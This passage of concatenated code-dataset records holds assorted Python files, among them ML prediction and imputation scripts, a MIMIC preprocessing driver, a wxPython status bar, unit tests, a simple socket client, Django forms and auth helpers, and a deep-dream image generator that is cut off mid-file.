):\n print(prediction)\n\n # save results as csv\n prediction = prediction.round(2) # round to 2 dp\n description = prediction.describe()\n description = description.round(2) # round to 2 dp\n prediction.to_csv(RESULTS_PATH + \"Prediction_\" + MODEL_NAME + \"_\" + DATASET_NAME + \".csv\")\n description.to_csv(RESULTS_PATH + \"Description_\" + MODEL_NAME + \"_\"+ DATASET_NAME + \".csv\")\n\n print(prediction.describe())\n\n\n \"\"\"\n cm = confusion_matrix(y, predicted_index)\n # tn, fp, fn, tp = confusion_matrix(y, predicted_index).ravel()\n # print(\"tn: {} fp: {} fn: {} tp: {}\".format(tn, fp, fn, tp))\n\n # calculate metrics\n report = classification_report(y, predicted_index, zero_division=0)\n accuracy = accuracy_score(y, predicted_index)\n precision_macro = precision_score(y, predicted_index, average=\"macro\", zero_division=0)\n precision_micro = precision_score(y, predicted_index, average=\"micro\", zero_division=0)\n recall_macro = recall_score(y, predicted_index, average=\"macro\", zero_division=0)\n recall_micro = recall_score(y, predicted_index, average=\"micro\", zero_division=0)\n f1_score_macro = f1_score(y, predicted_index, average=\"macro\", zero_division=0)\n f1_score_micro = f1_score(y, predicted_index, average=\"micro\", zero_division=0)\n\n # calculate metrics from confusion matrix\n true_pos = np.diag(cm) # true positives are the diagonal of cm\n false_pos = np.sum(cm, axis=0) - true_pos\n false_neg = np.sum(cm, axis=1) - true_pos\n\n\n # python return 0 divide by 0 as NAN\n #precision = np.sum(np.nan_to_num(true_pos / (true_pos + false_pos)))\n #recall = np.sum(np.nan_to_num(true_pos / (true_pos + false_neg)))\n #specificity = np.sum(np.nan_to_num(true_neg / (true_neg + false_pos)))\n print(\"Accuracy: \", accuracy)\n print(\"Precsion macro: \", precision_macro)\n print(\"Precsion micro: \", precision_micro)\n print(\"Recall macro: \", recall_macro)\n print(\"Recall micro: \", recall_micro)\n print(\"F1 score macro: \", f1_score_macro)\n print(\"F1 score micro: \", f1_score_micro)\n print(report)\n\n\n #print(\"Specificity: \", specificity)\n\n # plot confusion matrix\n disp = ConfusionMatrixDisplay(confusion_matrix=cm)\n disp.plot()\n plt.title(PLOT_TITLE + \"Confusion Matrix\")\n plt.xlabel('Predicted')\n plt.ylabel('True')\n plt.show()\n\n # plot graph\n xaxis = []\n xaxis.extend(range(0, len(X)))\n plt.scatter(xaxis, predicted_note)\n plt.title(\"Predicted Note of OnlyA4Recorded using \" + PLOT_TITLE)\n plt.xlabel('Note Sample')\n plt.ylabel('Predicted Note')\n plt.show()\n \"\"\"\n\n\n","sub_path":"Neural Networks/Audio/CNN_Predict.py","file_name":"CNN_Predict.py","file_ext":"py","file_size_in_byte":5065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"355997403","text":"import os\r\nfrom subprocess import call\r\n\r\nbase = \"../../../mimic-iii-clinical-database-1.4/\"\r\ninput_data = \"cut1000\"\r\nsubject_data = \"output_subjects_1000\"\r\nepisodes_data = \"output_episodes_1000\"\r\nlistfiles_data = \"output_listfiles_1000\"\r\n\r\n# works in windows but not mac:\r\n# os.system(\"extract_subjects.py \" + base + input_data + \" \" + subject_data)\r\n# os.system(\"validate_events.py \" + subject_data)\r\n# os.system(\"create_readmission.py \" + subject_data + \" \" + \"--custom-model model-1\")\r\nos.system(\"extract_episodes_from_subjects.py \" + subject_data)\r\nos.system(\"create_readmission_data.py \" + subject_data + \" \" + episodes_data)\r\nos.system(\"split_train_val_test.py \" + episodes_data + \" \" + listfiles_data)\r\n\r\n# call(['python3', 'extract_subjects.py', base + input_data, subject_data])\r\n# call(['python3', 'validate_events.py', subject_data])\r\n# call(['python3', 'create_readmission.py', subject_data])\r\n# call(['python3', 'extract_episodes_from_subjects.py', subject_data])\r\n# call(['python3', 'create_readmission_data.py', subject_data, episodes_data])\r\n# call(['python3', 'split_train_val_test.py', episodes_data, listfiles_data])\r\n\r\n\r\n","sub_path":"mimic3-readmission/scripts/OF_preprocess.py","file_name":"OF_preprocess.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"264617048","text":"import pandas as pd\nfrom fancyimpute import mice\n\nfrom . import missing_value_pred as mvp\nfrom d3m.primitive_interfaces.transformer import TransformerPrimitiveBase\nfrom d3m.primitive_interfaces.base import CallResult\nimport stopit\nimport math\n\nfrom d3m import container\nfrom d3m.metadata import hyperparams\nfrom d3m.metadata.hyperparams import UniformBool, Hyperparams\n\nfrom . import config\n\nInput = container.DataFrame\nOutput = container.DataFrame\n\nclass MiceHyperparameter(Hyperparams):\n verbose = UniformBool(default=False,\n semantic_types=['http://schema.org/Boolean',\n 'https://metadata.datadrivendiscovery.org/types/ControlParameter'])\n\nclass MICE(TransformerPrimitiveBase[Input, Output, MiceHyperparameter]):\n \"\"\"\n Impute the missing value using MICE.\n This class is a wrapper from fancyimpute-mice\n\n Parameters:\n ----------\n verbose: bool\n Control the verbosity\n \"\"\"\n\n metadata = hyperparams.base.PrimitiveMetadata({\n ### Required\n \"id\": \"3f72646a-6d70-3b65-ab42-f6a41552cecb\",\n \"version\": config.VERSION,\n \"name\": \"DSBox MICE Imputer\",\n \"description\": \"Impute missing values using the MICE algorithm\",\n \"python_path\": \"d3m.primitives.data_cleaning.MiceImputation.DSBOX\",\n \"primitive_family\": \"DATA_CLEANING\",\n \"algorithm_types\": [ \"IMPUTATION\" ],\n \"source\": {\n \"name\": config.D3M_PERFORMER_TEAM,\n \"contact\": config.D3M_CONTACT,\n \"uris\": [ config.REPOSITORY ]\n },\n ### Automatically generated\n # \"primitive_code\"\n # \"original_python_path\"\n # \"schema\"\n # \"structural_type\"\n ### Optional\n \"keywords\": [ \"preprocessing\", \"imputation\" ],\n \"installation\": [ config.INSTALLATION ],\n \"location_uris\": [],\n \"precondition\": [ hyperparams.base.PrimitivePrecondition.NO_CATEGORICAL_VALUES ],\n # \"effects\": [ hyperparams.base.PrimitiveEffects.NO_MISSING_VALUES ],\n \"hyperparms_to_tune\": []\n })\n\n\n def __init__(self, *, hyperparams: MiceHyperparameter) -> None:\n super().__init__(hyperparams=hyperparams)\n # All primitives must define these attributes\n self.hyperparams = hyperparams\n\n # All other attributes must be private with leading underscore\n self._train_x = None\n self._has_finished = False\n self._iterations_done = False\n self._verbose = hyperparams['verbose'] if hyperparams else False\n\n\n def produce(self, *, inputs: Input, timeout: float = None, iterations: int = None) -> CallResult[Output]:\n \"\"\"\n precond: run fit() before\n\n to complete the data, based on the learned parameters, support:\n -> greedy search\n\n also support the untrainable methods:\n -> iteratively regression\n -> other\n\n Parameters:\n ----------\n data: pandas dataframe\n label: pandas series, used for the evaluation of imputation\n\n TODO:\n ----------\n 1. add evaluation part for __simpleImpute()\n\n \"\"\"\n\n if (timeout is None):\n timeout = 2**31-1\n if (iterations is None):\n iterations = 100 # default value for mice\n\n if isinstance(inputs, pd.DataFrame):\n data = inputs.copy()\n else:\n data = inputs[0].copy()\n # record keys:\n keys = data.keys()\n index = data.index\n\n # setup the timeout\n with stopit.ThreadingTimeout(timeout) as to_ctx_mrg:\n assert to_ctx_mrg.state == to_ctx_mrg.EXECUTING\n\n # start completing data...\n if self._verbose: print(\"=========> impute by fancyimpute-mice:\")\n data_clean = self.__mice(data, iterations)\n\n value = None\n if to_ctx_mrg.state == to_ctx_mrg.EXECUTED:\n self._has_finished = True\n self._iterations_done = True\n value =pd.DataFrame(data_clean, index, keys)\n elif to_ctx_mrg.state == to_ctx_mrg.TIMED_OUT:\n self._has_finished = False\n self._iterations_done = False\n return CallResult(value, self._has_finished, self._iterations_done)\n\n\n\n #============================================ core function ============================================\n def __mice(self, test_data, iterations):\n \"\"\"\n wrap fancyimpute-mice\n \"\"\"\n missing_col_id = []\n test_data = mvp.df2np(test_data, missing_col_id, self._verbose)\n if (len(missing_col_id) == 0): return test_data\n complete_data = mice(n_imputations=iterations, verbose=(1 if self._verbose else 0)).complete(test_data)\n return complete_data\n","sub_path":"dsbox/datapreprocessing/cleaner/mice.py","file_name":"mice.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"506895308","text":"from ..base import *\n\n\nclass StatusBar(BasicToolbar):\n\n def __init__(self, parent, pos, width):\n\n back_img = wx.Image(os.path.join(GFX_PATH, \"statusbar_bg.png\"))\n borders = {}\n\n for part in (\"left\", \"right\"):\n path = os.path.join(GFX_PATH, \"statusbar_border_%s.png\" % part)\n borders[part] = wx.Bitmap(path)\n\n center_img = wx.Image(os.path.join(GFX_PATH, \"statusbar_border_center.png\"))\n\n if not center_img.HasAlpha():\n center_img.InitAlpha()\n\n w, h = borders[\"left\"].GetSize()\n margin = 9\n x = 160\n self._mode_text_rect = wx.Rect(margin, 5, x - margin * 2, h - 10)\n self._info_text_rect = wx.Rect(x + margin, 5, width - x - margin * 2, h - 10)\n\n bitmap = back_img.AdjustChannels(1.6, 1.6, 1.6).Scale(width, h).ConvertToBitmap()\n mem_dc = wx.MemoryDC(bitmap)\n mem_dc.DrawBitmap(borders[\"left\"], 0, 0)\n size = (x - 2 * w, h)\n borders[\"center\"] = center_img.Scale(*size).ConvertToBitmap()\n mem_dc.DrawBitmap(borders[\"center\"], w, 0)\n mem_dc.DrawBitmap(borders[\"right\"], x - w, 0)\n mem_dc.DrawBitmap(borders[\"left\"], x, 0)\n size = (width - x - 2 * w, h)\n borders[\"center\"] = center_img.Scale(*size).ConvertToBitmap()\n mem_dc.DrawBitmap(borders[\"center\"], x + w, 0)\n mem_dc.DrawBitmap(borders[\"right\"], width - w, 0)\n mem_dc.SelectObject(wx.NullBitmap)\n\n BasicToolbar.__init__(self, parent, pos, bitmap)\n\n self._mode_text = \"\"\n self._info_text = \"\"\n\n self.Bind(wx.EVT_PAINT, self.__draw)\n\n Mgr.add_app_updater(\"status\", self.__update_status)\n\n def __update_status(self, *status_specs):\n\n data = GlobalData[\"status_data\"][status_specs[0]]\n\n for spec in status_specs[1:]:\n data = data[spec]\n\n mode_text = data[\"mode\"]\n\n if mode_text and mode_text != self._mode_text:\n self.__set_mode_text(mode_text)\n\n info_text = data[\"info\"]\n\n if info_text != self._info_text:\n self.__set_info_text(info_text)\n\n def __draw(self, event):\n\n dc = wx.AutoBufferedPaintDCFactory(self)\n dc.DrawBitmap(self.get_bitmap(), 0, 0)\n dc.SetFont(Fonts.get(\"default\"))\n dc.DrawLabel(self._mode_text, self._mode_text_rect, wx.ALIGN_CENTER_VERTICAL)\n dc.DrawLabel(self._info_text, self._info_text_rect, wx.ALIGN_CENTER_VERTICAL)\n\n def __set_mode_text(self, text):\n\n self._mode_text = text\n self.RefreshRect(self._mode_text_rect)\n\n def __set_info_text(self, text):\n\n self._info_text = text\n self.RefreshRect(self._info_text_rect)\n","sub_path":"src/gui/components/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"54529278","text":"import unittest\nfrom mediawiki_article_sentences_refs import *\n\nCATALAN_DIR = 'test/resources/catalan'\nlog_filenames = (\n '2010_Catalan_autonomy_protest.clean-wikitext.log',\n '2010_Catalan_autonomy_protest.map_reftoken_to_urls.log',\n '2010_Catalan_autonomy_protest.orig-wikitext.log',\n '2010_Catalan_autonomy_protest.sentences.log',\n '2010_Catalan_autonomy_protest.urls.log',\n '2010_Catalan_autonomy_protest.wikitext_with_reftokens.log',\n)\n\nlog_paths = (\n \"{0}/{1}\".format(CATALAN_DIR, fn)\n for fn in log_filenames\n)\n\n\nwith open(log_paths.next()) as f:\n text = f.read().decode('utf-8')\n catln_clean_wikitext = text\n\nwith open(log_paths.next()) as f:\n text = f.read()\n catln_map_reftoken_to_urls = eval(text)\n\nwith open(log_paths.next()) as f:\n text = f.read().decode('utf-8')\n catln_wikitext = text\n\nwith open(log_paths.next()) as f:\n text = f.read().decode('utf-8')\n catln_sentences = text.split('\\n')\n\nwith open(log_paths.next()) as f:\n text = f.read().decode('utf-8')\n catln_urls = [\n urls.split('\\t')\n for urls in text.split('\\n')\n ]\n\nwith open(log_paths.next()) as f:\n text = f.read().decode('utf-8')\n catln_wikitext_with_reftokens = text\n\n\nclass TestCatalan(unittest.TestCase):\n\n def test_clean_wikitext(self):\n expect = catln_clean_wikitext\n actual = clean_wikitext(catln_wikitext)\n self.assertItemsEqual(expect, actual)\n\n def test_map_reftoken_to_urls__map(self):\n expect = catln_map_reftoken_to_urls\n actual, __ = collect_refs(catln_clean_wikitext)\n self.assertItemsEqual(expect, actual)\n\n def test_map_reftoken_to_urls__map(self):\n expect = catln_wikitext_with_reftokens\n __, actual = collect_refs(catln_clean_wikitext)\n self.assertEqual(\n expect,\n actual,\n u\"\\n***expect:***\\n{0}\\n***actual:***\\n{1}\\n\".format(\n expect, actual\n ).encode('utf-8')\n )\n","sub_path":"test/test_catalan.py","file_name":"test_catalan.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"331613","text":"import socket\n\ns = socket.socket()\ns.connect(('192.168.5.124',9001))\n\nwhile True:\n data = input(\">> \").strip()\n if data == \"\":\n continue\n if data == \"q\":\n s.close()\n break\n s.send(bytes(data,encoding=\"utf-8\"))\n data = s.recv(1024)\n print(\"recv:\",data.decode())","sub_path":"day9/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"78881248","text":"import matplotlib.pyplot as plt\nimport MySQLdb as mdb\nfrom matplotlib import colors\n\n\ndef graph():\n # 连接数据库\n conn = mdb.connect(host='127.0.0.1', port=3306, user='root', passwd='root', db='alibaba_trace', charset='utf8')\n\n # 如果使用事务引擎,可以设置自动提交事务,或者在每次操作完成后手动提交事务conn.commit()\n conn.autocommit(1) # conn.autocommit(True)\n\n # 使用cursor()方法获取操作游标\n cursor = conn.cursor()\n # 因该模块底层其实是调用CAPI的,所以,需要先得到当前指向数据库的指针。\n\n try:\n cursor.execute(\"select DISTINCT instance_id from container_usage\")\n records = cursor.fetchall()\n result = list(records)\n print(result)\n\n # 绘图\n fig = plt.figure(figsize=(20, 4))\n ax1 = fig.add_subplot(1, 3, 1)\n ax2 = fig.add_subplot(1, 3, 2)\n ax3 = fig.add_subplot(1, 3, 3)\n ax1.set_title('cpu utilization')\n ax2.set_title('memory utilization')\n ax3.set_title('disk utilization')\n ax1.set_xlabel(\"time(hour)\")\n ax2.set_xlabel(\"time(hour)\")\n ax3.set_xlabel(\"time(hour)\")\n ax1.set_ylabel('instance id')\n norm = colors.Normalize(vmin=0, vmax=50)\n\n res = []\n res[:] = map(list, result)\n instance_ids = [x[0] for x in res]\n instance_ids = sorted(instance_ids)\n ax1.set_xlim(0, 12)\n ax2.set_xlim(0, 12)\n ax3.set_xlim(0, 12)\n ax1.set_ylim(0, max(instance_ids))\n ax2.set_ylim(0, max(instance_ids))\n ax3.set_ylim(0, max(instance_ids))\n for i in instance_ids:\n # if i > 10000 and i <= 12000:\n # if i <= 2000:\n print(i)\n cursor.execute(\n \"select instance_id, ts, cpu_util, mem_util, disk_util from container_usage where instance_id = (%d)\" % (\n i))\n result = cursor.fetchall()\n result = list(result)\n res[:] = map(list, result)\n instance_id = [x[0] for x in res]\n time_stamp = [x[1] for x in res]\n cpu_util = [x[2] for x in res]\n # print(cpu_util)\n mem_util = [x[3] for x in res]\n # print(mem_util)\n disk_util = [x[4] for x in res]\n # print(disk_util)\n timestamp = [(x / 3600 - 11) for x in time_stamp]\n timestamp = sorted(timestamp)\n # ax1.plot(timestamp, cpu_util)\n # ax2.plot(timestamp, mem_util)\n # ax3.plot(timestamp, disk_util)\n ax1.scatter(timestamp, instance_id, c=cpu_util, norm=norm, alpha=0.5, s=0.1)\n ax2.scatter(timestamp, instance_id, c=mem_util, norm=norm, alpha=0.5, s=0.1)\n ax3.scatter(timestamp, instance_id, c=disk_util, norm=norm, alpha=0.5, s=0.1)\n # 绘制渐变色标注\n gci = plt.scatter(timestamp, instance_id, c=cpu_util, norm=norm, alpha=0.5, s=0.001)\n cbar = plt.colorbar(gci)\n cbar.set_label('used')\n plt.savefig('../imgs_mysql/container_usage.png')\n plt.show()\n except:\n import traceback\n traceback.print_exc()\n # 发生错误时回滚\n conn.rollback()\n finally:\n # 关闭游标连接\n cursor.close()\n # 关闭数据库连接\n conn.close()\n\nif __name__ == '__main__':\n graph()\n","sub_path":"mysql_analysis/batch_job/machine_instance_number.py","file_name":"machine_instance_number.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"230537563","text":"#Given a sorted array, two integers k and x, find the k closest elements to x in the array. The result should also be sorted in ascending order. If there is a tie, the smaller elements are always preferred.\n\n#Example 1:\n#Input: [1,2,3,4,5], k=4, x=3\n#Output: [1,2,3,4]\n#Example 2:\n#Input: [1,2,3,4,5], k=4, x=-1\n#Output: [1,2,3,4]\n#Note:\n#The value k is positive and will always be smaller than the length of the sorted array.\n#Length of the given array is positive and will not exceed 104\n#Absolute value of elements in the array and x will not exceed 104\n\nimport heapq\n\nclass Solution(object):\n def findClosestElements(self, arr, k, x):\n \"\"\"\n :type arr: List[int]\n :type k: int\n :type x: int\n :rtype: List[int]\n \"\"\"\n \"\"\"\n if arr == []:\n return []\n if x not in arr:\n return arr[:k+1]\n left = 0\n right = len(arr) - k\n while left < right:\n mid = (left + right) // 2\n if x - arr[mid] > arr[mid+k] - x:\n left = mid + 1\n else:\n right = mid\n return arr[left:left+k]\n \"\"\"\n m = len(arr)\n sub = [((arr[i]-x)**2, i) for i in range(m)]\n heapq.heapify(sub)\n return sorted([arr[heapq.heappop(sub)[1]] for i in range(k)])","sub_path":"python_code/658_Find_K_Closest_Elements.py","file_name":"658_Find_K_Closest_Elements.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"45493514","text":"from tests.views.message.utils import post_and_get_response\n\n\ndef test_message_nested_sync_input(client):\n data = {\"dictionary\": {\"name\": \"test\"}}\n action_queue = [\n {\"payload\": {\"name\": \"dictionary.name\", \"value\": \"test1\"}, \"type\": \"syncInput\",}\n ]\n response = post_and_get_response(\n client,\n url=\"/message/tests.views.fake_components.FakeComponent\",\n data=data,\n action_queue=action_queue,\n )\n\n assert not response[\"errors\"]\n assert response[\"data\"].get(\"dictionary\") == {\"name\": \"test1\"}\n","sub_path":"tests/views/message/test_sync_input.py","file_name":"test_sync_input.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"462752434","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Date : 2018-12-16 21:07:57\r\n# @Author : emmmmm\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom datetime import datetime\r\n\r\n\r\ndef hour_Hz(file_path):\r\n datals = []\r\n date_h = []\r\n hour_count = {}\r\n\r\n f = open(file_path) # 对xx文本的分析\r\n for i in f:\r\n datals.append(i.split(\",\")) # 文本格式分割形成列表\r\n f.close()\r\n\r\n dateall = datals[0] # datals[0]表示所有date的集合\r\n # print(len(dateall))\r\n for i in range(len(dateall)):\r\n date_h.append((dateall[i][11:13])) # 取时间hour部分 ps.date_h是所有小时的集合\r\n # print(date_h)\r\n\r\n for key in date_h:\r\n hour_count[key] = hour_count.get(key, 0) + 1\r\n # print (hour_count)\r\n return hour_count\r\n\r\ndef hour_Hz_plot(file_path):\r\n hour_sort=[]\r\n h_key_sort = []\r\n\r\n hour_H = hour_Hz(file_path) #得到时间分析数据,各时间的出现频率\r\n h_key = list(hour_H.keys())\r\n ind = np.arange(len(h_key)) # 图表的x轴间隔\r\n # 整理数据\r\n for i in range(len(h_key)):\r\n index = str(i) if i>9 else '0' + str(i)\r\n hour_sort.append(hour_H[index]) # 整理散乱顺序数据为00-23顺序\r\n h_key_sort.append(i) # 绘图时x轴刻度\r\n\r\n # 绘图\r\n fig=plt.figure()\r\n ax = fig.add_subplot(1,1,1)\r\n rects1 = ax.plot(ind, hour_sort, 'r-', marker='o') # 设置图表参数\r\n plt.xticks(np.arange(len(h_key)), h_key_sort) # 画x轴标签\r\n # plt.show()\r\n\r\ndef weekday_2_box(file_path):\r\n datals = []\r\n date_weekday = []\r\n weekday_count = {}\r\n f = open(file_path)\r\n for i in f:\r\n datals.append(i.split(\",\"))\r\n f.close()\r\n\r\n dateall = datals[0]\r\n # print(len(dateall))\r\n for i in range(len(dateall)):\r\n weekday = datetime.strptime((dateall[i][0:10]),\"%Y-%M-%d\").weekday()+1\r\n date_weekday.append(weekday)\r\n all_weekday = date_weekday\r\n # print(all_weekday)\r\n fig,ax = plt.subplots(figsize=(5,3))\r\n plt.boxplot(all_weekday)\r\n plt.title('weekday boxplot')\r\n plt.setp(ax,xticklabels=['weekday'])\r\n plt.grid(True)\r\n # plt.show()\r\n\r\ndef main(file_path):\r\n weekday_2_box(file_path)\r\n hour_Hz_plot(file_path)\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n # commits-test.txt 为测试文本\r\n main(\"commits-test.txt\") # 在这里修改成要分析的文本就好,格式:xxx.txt\r\n\r\n\r\n\r\n","sub_path":"article_code/Github-commit-analysis.py","file_name":"Github-commit-analysis.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"18381085","text":"from django import forms\nfrom .models import *\n\nclass RequisicaoForm(forms.ModelForm):\n class Meta:\n model = Cadastro_Requisicao\n fields = '__all__'\n\n\nclass ItemForm(forms.ModelForm):\n class Meta:\n model = Item_requisicao\n fields = '__all__'\n\n def __init__(self, *args, **kwargs ): \n self.id_form = kwargs.pop('id_form')\n self.disable_serie = kwargs.pop('disable_serie')\n self.disable_descricao = kwargs.pop('disable_descricao') \n super(ItemForm, self).__init__(*args, **kwargs) \n\n self.fields['Requisicao'].disabled = True \n self.fields['Requisicao'].initial = self.id_form\n self.fields['Numero_serie'].disabled = self.disable_serie\n self.fields['Descricao'].disabled = self.disable_descricao\n","sub_path":"requisicao/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"220003602","text":"# -*- coding: utf-8 -*-\r\nimport inspect\r\n\r\nimport re\r\nfrom django.conf import settings\r\nfrom django.core.exceptions import ImproperlyConfigured, PermissionDenied\r\nfrom djsqla.contrib.auth.backends import SQLAlchemyUserBackend\r\nfrom djsqla.contrib.auth.utils import load_backend\r\n\r\nfrom auth.signals import user_login_failed\r\n\r\n\r\ndef _get_backends(return_tuples=False):\r\n backends = []\r\n for backend_path in settings.AUTHENTICATION_BACKENDS:\r\n backend = load_backend(backend_path)\r\n backends.append((backend, backend_path) if return_tuples else backend)\r\n if not backends:\r\n raise ImproperlyConfigured(\r\n 'No authentication backends have been defined. Does '\r\n 'AUTHENTICATION_BACKENDS contain anything?'\r\n )\r\n return backends\r\n\r\n\r\ndef _clean_credentials(credentials):\r\n \"\"\"\r\n Cleans a dictionary of credentials of potentially sensitive info before\r\n sending to less secure functions.\r\n Not comprehensive - intended for user_login_failed signal\r\n \"\"\"\r\n SENSITIVE_CREDENTIALS = re.compile('api|token|key|secret|password|signature', re.I)\r\n CLEANSED_SUBSTITUTE = '********************'\r\n for key in credentials:\r\n if SENSITIVE_CREDENTIALS.search(key):\r\n credentials[key] = CLEANSED_SUBSTITUTE\r\n return credentials\r\n\r\n\r\ndef authenticate(djsqla_sessions, **credentials):\r\n \"\"\"\r\n If the given credentials are valid, return a User object.\r\n \"\"\"\r\n for backend, backend_path in _get_backends(return_tuples=True):\r\n # assert False, backend\r\n try:\r\n inspect.getcallargs(backend.authenticate, **credentials)\r\n except TypeError:\r\n # This backend doesn't accept these credentials as arguments. Try the next one.\r\n continue\r\n\r\n if isinstance(backend, SQLAlchemyUserBackend):\r\n backend_db = backend.get_db_name()\r\n if hasattr(djsqla_sessions, backend_db):\r\n session = getattr(djsqla_sessions, backend_db)\r\n setattr(backend, \"djsqla_session\", session)\r\n\r\n try:\r\n user = backend.authenticate(**credentials)\r\n except PermissionDenied:\r\n # This backend says to stop in our tracks - this user should not be allowed in at all.\r\n return None\r\n if user is None:\r\n continue\r\n # Annotate the user object with the path of the backend.\r\n user.backend = backend_path\r\n return user\r\n\r\n # The credentials supplied are invalid to all backends, fire signal\r\n user_login_failed.send(sender=__name__, credentials=_clean_credentials(credentials))","sub_path":"djsqla/contrib/auth/authenticate.py","file_name":"authenticate.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"59402843","text":"import sys\r\nsys.path.append(\"../\")\r\nimport os\r\nimport time\r\nimport random\r\nimport math\r\nimport scipy\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nfrom torchvision import models\r\nfrom torchvision import transforms, utils\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image, ImageFilter, ImageChops\r\nfrom torch.nn import functional as F\r\n\r\nfrom dict_network.dict_net import *\r\n#from deep_dream_mnist.network_mnist import *\r\n\r\ndef create_random_image(image_dim,img_is2D,random_seed=0):\r\n '''Creates a random image of of shape given by image_dim which should be a tuple of length 3 HxWxC '''\r\n np.random.seed(random_seed)\r\n rand_image_np = np.random.random(image_dim)*255\r\n \r\n if img_is2D:\r\n rand_image = Image.fromarray((rand_image_np)[:,:,0].astype('uint8'),'L')\r\n else:\r\n rand_image = Image.fromarray((rand_image_np).astype('uint8'),'RGB')\r\n\r\n return rand_image\r\n \r\ndef preprocess_image(input_image,mean,std):\r\n '''Converts a PIL image to tensor and normalizes according to the mean and std provided,\r\n both of which should be tuples of length 3'''\r\n preprocess = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean,std),\r\n ])\r\n\r\n return preprocess(input_image)\r\n \r\ndef postprocess_batch(image_tensor,mean,std,img_is2D,device):\r\n '''Multiplies and then adds channelwise the tensor with the std and mean tuples respectively. In short, does the \r\n inverse of the normalizing function in preprocess'''\r\n #image_dim = image_tensor.shape\r\n \r\n if img_is2D:\r\n image_tensor = image_tensor*std[0] + mean[0]\r\n else:\r\n std_tensor = torch.Tensor(list(std)).view(1,3,1,1).to(device)\r\n mean_tensor = torch.Tensor(list(mean)).view(1,3,1,1).to(device)\r\n\r\n image_tensor = image_tensor * std_tensor + mean_tensor\r\n\r\n return image_tensor\r\n \r\ndef dream(network,labels,image_dim,mean,std,nItr=100,lr=0.1,random_seed=0,kernel_size=3,sigma=0.5,loss_type='logit'):\r\n '''Given a trained convolutional network and a list of desired label numbers,\r\n function returns a batch of images (BxCxHxW) that has been optimized to output high confidence\r\n for that the specified labels when forward passed through the network\r\n image_dim : tuple with length 2 or 3 for 2D or 3D image to be produced. HxWxC Example (224,224,3) or (32,128,1)\r\n mean : tuple of length 3 with mean pixel value. Example (0.5,0.5,0.5) for 3D, (0.5,) for 2D\r\n mean : tuple of length 3 with standard deviation of pixel values. Example (0.5,0.5,0.5) for 3D, (0.5,) for 2D\r\n '''\r\n network.eval()\r\n img_is2D = check_if2D(image_dim)\r\n gaussian_filter = GaussianFilter(img_is2D,kernel_size,sigma)\r\n \r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n network,gaussian_filter = move_network_to_device(network,gaussian_filter,device)\r\n \r\n image_tensor = dream_kernel(network,gaussian_filter,image_dim,labels,mean,std,nItr,lr,random_seed,device,loss_type)\r\n\r\n return image_tensor\r\n\r\ndef dream_kernel(network,gaussian_filter,image_dim,labels,mean,std,nItr,lr,random_seed,device,loss_type):\r\n '''Creates a batch of random images and optimizes it to output high confidence for the specified labels'''\r\n img_is2D = check_if2D(image_dim)\r\n for i in range(len(labels)):\r\n im = create_random_image(image_dim,img_is2D,random_seed)\r\n im = preprocess_image(im,mean,std)\r\n if i== 0:\r\n img = im.unsqueeze(0)\r\n else:\r\n img = torch.cat((img,im.unsqueeze(0)),0)\r\n \r\n img = move_img_to_device(img,device)\r\n img = Variable(img,requires_grad=True)\r\n \r\n for _ in range(nItr):\r\n #start = time.time()\r\n out = network(img)\r\n #end = time.time()\r\n #print(\"Time for forward pass \",end-start)\r\n \r\n loss = 0\r\n if loss_type == \"logit\":\r\n for index,label in enumerate(labels):\r\n loss += out[index,label]\r\n \r\n if loss_type == \"softmax\":\r\n for index,label in enumerate(labels):\r\n loss += F.softmax(out,dim=1)[index,label]\r\n\r\n if loss_type == \"log_softmax\":\r\n for index,label in enumerate(labels):\r\n loss += torch.log(F.softmax(out,dim=1)[index,label])\r\n\r\n #start = time.time()\r\n loss.backward()\r\n #end = time.time()\r\n #print(\"Time for backprop \",end-start)\r\n\r\n\r\n #start = time.time()\r\n avg_grad = torch.mean(torch.abs(img.grad.data)).item()\r\n norm_lr = lr / (avg_grad + 1e-20)\r\n img.data += norm_lr * img.grad.data\r\n img.data = torch.clamp(img.data,-1,1)\r\n #end = time.time()\r\n #print(\"Time for update \",end-start)\r\n\r\n\r\n #start = time.time()\r\n img.data = gaussian_filter(img.data)\r\n #end = time.time()\r\n #print(\"Time for regularization\",end-start)\r\n\r\n\r\n img.grad.data.zero_()\r\n img = postprocess_batch(img,mean,std,img_is2D,device)\r\n \r\n return img\r\n\r\ndef 